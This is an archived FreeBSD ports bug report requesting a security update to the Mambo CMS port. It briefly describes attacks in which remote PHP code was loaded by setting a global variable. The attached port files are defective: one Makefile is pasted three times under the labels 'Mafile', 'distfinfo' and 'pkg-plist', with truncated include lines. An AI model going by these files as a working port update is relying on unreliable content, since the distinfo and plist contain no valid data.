From owner-freebsd-ports-bugs@FreeBSD.ORG Mon Nov 28 11:00:19 2005 Return-Path: X-Original-To: freebsd-ports-bugs@hub.freebsd.org Delivered-To: freebsd-ports-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 86DC716A41F for ; Mon, 28 Nov 2005 11:00:19 +0000 (GMT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id A47B643D62 for ; Mon, 28 Nov 2005 11:00:17 +0000 (GMT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.13.3/8.13.3) with ESMTP id jASB0Hjl086902 for ; Mon, 28 Nov 2005 11:00:17 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.13.3/8.13.1/Submit) id jASB0Hwg086900; Mon, 28 Nov 2005 11:00:17 GMT (envelope-from gnats) Resent-Date: Mon, 28 Nov 2005 11:00:17 GMT Resent-Message-Id: <200511281100.jASB0Hwg086900@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-ports-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Francisco Alves Cabrita Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 261FF16A41F for ; Mon, 28 Nov 2005 10:57:18 +0000 (GMT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (www.freebsd.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id ABD5343D45 for ; Mon, 28 Nov 2005 10:57:17 +0000 (GMT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.13.1/8.13.1) with ESMTP id jASAvHw8014606 for ; Mon, 28 Nov 2005 10:57:17 GMT (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.13.1/8.13.1/Submit) id jASAvHLZ014605; Mon, 28 Nov 2005 10:57:17 GMT (envelope-from nobody) Message-Id: <200511281057.jASAvHLZ014605@www.freebsd.org> Date: Mon, 28 Nov 2005 10:57:17 GMT From: Francisco Alves Cabrita To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-2.3 Cc: Subject: ports/89665: [Security Update]: www/mambo X-BeenThere: freebsd-ports-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Ports bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 28 Nov 2005 11:00:19 -0000 >Number: 89665 >Category: ports >Synopsis: [Security Update]: www/mambo >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: update >Submitter-Id: current-users >Arrival-Date: Mon Nov 28 11:00:16 GMT 2005 >Closed-Date: >Last-Modified: >Originator: Francisco Alves Cabrita >Release: FreeBSD 6.0-STABLE >Organization: Núcleo Português de FreeBSD >Environment: FreeBSD fac.e10.pt 6.0-STABLE FreeBSD 6.0-STABLE #0: Fri Nov 25 16:42:45 WET 2005 fac@fac.e10.pt:/usr/obj/usr/src/sys/MOBILE i386 >Description: There has been a spate of attacks on Mambo sites in the last few days. These have been serious, in that they involved running arbitrary PHP code in the site attacked. This means that the security of information may have been compromised, and back door code may have been installed. Anyone who has been attacked should take great care to ensure that their site has been thoroughly restored to a safe condition. If advice is needed, please post in the Mambo forums. http://www.mamboserver.com/index.php?option=com_content&task=view&id=172&Itemid=1 >How-To-Repeat: >Fix: This patch, blocks exploits that attempt to set a value for the global used to indicate where code is to be loaded. By doing this, the exploits allow arbitrary code to be loaded from a web site under the hacker's control. Mafile EXTRACT_DEPENDS= unzip:${PORTSDIR}/archivers/unzip NO_BUILD= yes USE_MYSQL= yes USE_PHP= mysql session zlib gd pdf xml pcre WANT_PHP_WEB= yes PKGMESSAGE= ${WRKDIR}/pkg-message SUB_FILES= pkg-message SUB_LIST+= MAMBO_DIR=${MAMBO_DIR} PLIST_SUB+= MAMBO_DIR=${MAMBO_DIR} MAMBO_DIR?= www/${PORTNAME} DIST_SUBDIR= ${PORTNAME} MAMBO_SRC= MamboV4.5.3-stable.tar.gz MAMBO_PATCH1= Mambo4523.security_fix.zip do-extract: @${MKDIR} ${WRKSRC} @${TAR} -zxf ${DISTDIR}/${DIST_SUBDIR}/${MAMBO_SRC} -C ${WRKSRC} @${UNZIP_CMD} -qo ${DISTDIR}/${DIST_SUBDIR}/${MAMBO_PATCH1} -d ${WRKSRC} @${RM} -rf ${WRKSRC}/templates/rhuk_solarflare # remove empty do-install: @${MKDIR} ${PREFIX}/${MAMBO_DIR} @cd ${WRKSRC} && \ ${FIND} . -type d -exec ${MKDIR} ${PREFIX}/${MAMBO_DIR}/{} \; \ -exec ${CHOWN} ${WWWOWN}:${WWWGRP} ${PREFIX}/${MAMBO_DIR}/{} \; @cd ${WRKSRC} && \ ${FIND} . \! -type d -exec ${INSTALL_DATA} {} ${PREFIX}/${MAMBO_DIR}/{} \; \ -exec ${CHOWN} ${WWWOWN}:${WWWGRP} ${PREFIX}/${MAMBO_DIR}/{} \; post-install: @${CAT} ${PKGMESSAGE} .include distfinfo: EXTRACT_DEPENDS= unzip:${PORTSDIR}/archivers/unzip NO_BUILD= yes USE_MYSQL= yes USE_PHP= mysql session zlib gd pdf xml pcre WANT_PHP_WEB= yes PKGMESSAGE= ${WRKDIR}/pkg-message SUB_FILES= pkg-message SUB_LIST+= MAMBO_DIR=${MAMBO_DIR} PLIST_SUB+= MAMBO_DIR=${MAMBO_DIR} MAMBO_DIR?= www/${PORTNAME} DIST_SUBDIR= ${PORTNAME} MAMBO_SRC= MamboV4.5.3-stable.tar.gz MAMBO_PATCH1= Mambo4523.security_fix.zip do-extract: @${MKDIR} ${WRKSRC} @${TAR} -zxf ${DISTDIR}/${DIST_SUBDIR}/${MAMBO_SRC} -C ${WRKSRC} @${UNZIP_CMD} -qo ${DISTDIR}/${DIST_SUBDIR}/${MAMBO_PATCH1} -d ${WRKSRC} @${RM} -rf ${WRKSRC}/templates/rhuk_solarflare # remove empty do-install: @${MKDIR} ${PREFIX}/${MAMBO_DIR} @cd ${WRKSRC} && \ ${FIND} . -type d -exec ${MKDIR} ${PREFIX}/${MAMBO_DIR}/{} \; \ -exec ${CHOWN} ${WWWOWN}:${WWWGRP} ${PREFIX}/${MAMBO_DIR}/{} \; @cd ${WRKSRC} && \ ${FIND} . \! -type d -exec ${INSTALL_DATA} {} ${PREFIX}/${MAMBO_DIR}/{} \; \ -exec ${CHOWN} ${WWWOWN}:${WWWGRP} ${PREFIX}/${MAMBO_DIR}/{} \; post-install: @${CAT} ${PKGMESSAGE} .include pkg-plist: EXTRACT_DEPENDS= unzip:${PORTSDIR}/archivers/unzip NO_BUILD= yes USE_MYSQL= yes USE_PHP= mysql session zlib gd pdf xml pcre WANT_PHP_WEB= yes PKGMESSAGE= ${WRKDIR}/pkg-message SUB_FILES= pkg-message SUB_LIST+= MAMBO_DIR=${MAMBO_DIR} PLIST_SUB+= MAMBO_DIR=${MAMBO_DIR} MAMBO_DIR?= www/${PORTNAME} DIST_SUBDIR= ${PORTNAME} MAMBO_SRC= MamboV4.5.3-stable.tar.gz MAMBO_PATCH1= Mambo4523.security_fix.zip do-extract: @${MKDIR} ${WRKSRC} @${TAR} -zxf ${DISTDIR}/${DIST_SUBDIR}/${MAMBO_SRC} -C ${WRKSRC} @${UNZIP_CMD} -qo ${DISTDIR}/${DIST_SUBDIR}/${MAMBO_PATCH1} -d ${WRKSRC} @${RM} -rf ${WRKSRC}/templates/rhuk_solarflare # remove empty do-install: @${MKDIR} ${PREFIX}/${MAMBO_DIR} @cd ${WRKSRC} && \ ${FIND} . -type d -exec ${MKDIR} ${PREFIX}/${MAMBO_DIR}/{} \; \ -exec ${CHOWN} ${WWWOWN}:${WWWGRP} ${PREFIX}/${MAMBO_DIR}/{} \; @cd ${WRKSRC} && \ ${FIND} . \! -type d -exec ${INSTALL_DATA} {} ${PREFIX}/${MAMBO_DIR}/{} \; \ -exec ${CHOWN} ${WWWOWN}:${WWWGRP} ${PREFIX}/${MAMBO_DIR}/{} \; post-install: @${CAT} ${PKGMESSAGE} .include Thanks in advance Francisco Alves Cabrita >Release-Note: >Audit-Trail: >Unformatted: